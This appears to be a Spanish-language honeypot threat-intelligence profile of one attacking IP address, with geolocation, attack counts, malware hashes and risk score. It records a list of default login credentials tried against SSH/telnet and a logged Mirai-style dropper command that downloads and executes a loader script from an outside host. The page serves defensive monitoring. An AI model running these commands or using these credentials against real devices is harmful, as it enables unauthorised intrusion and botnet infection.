TROYANOSYVIRUS
Amenaza ActivaALTO

185.246.131.94

Pais de Origen🇧🇬 BG
Primera Deteccion18/4/2026
Ultima Actividad19/4/2026
ISPBrainStorm Network, Inc
🎯
368
Ataques Totales
🔌
2
Puertos
📡
2
Tipos Ataque
🦠
2
Malware

Geolocalizacion

Pais
🇧🇬 BG
Ciudad
Sofia
ASN
AS136258
ISP
BrainStorm Network, Inc

Tipos de Ataque

ssh_telnet_honeypot
yaml_exploit_honeypot

Puertos Atacados

233000

Malware Asociado

9641be11c9ed0855a453...da41d24f215ed0146853...

Credenciales Intentadas

🔐root/password
14x
🔐root/admin
14x
🔐root/(vacio)
13x
🔐root/root
11x
🔐root/12345
4x
🔐oracle/oracle
1x
🔐admin/smcadmin
1x
🔐admin/(vacio)
1x
🔐root/123456
1x
🔐support/support
1x
🔐admin/meinsm
1x
🔐admin/123456
1x
🔐root/Zte521
1x
🔐root/S2fGqNFs
1x
🔐default/S2fGqNFs
1x

Comandos Ejecutados

$cd /tmp || cd /run || cd /var/run || cd /dev/shm; wget https://tg-xxooxx888.8964.mom/loader.sh -O .x 2>/dev/null || curl -s https://tg-xxooxx888.8964.mom/loader.sh -o .x; chmod 777 .x; ./.x telnet; rm -f .x17x
$echo mirai17x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Evaluacion de Riesgo

60
/100
BajoMedioAltoCritico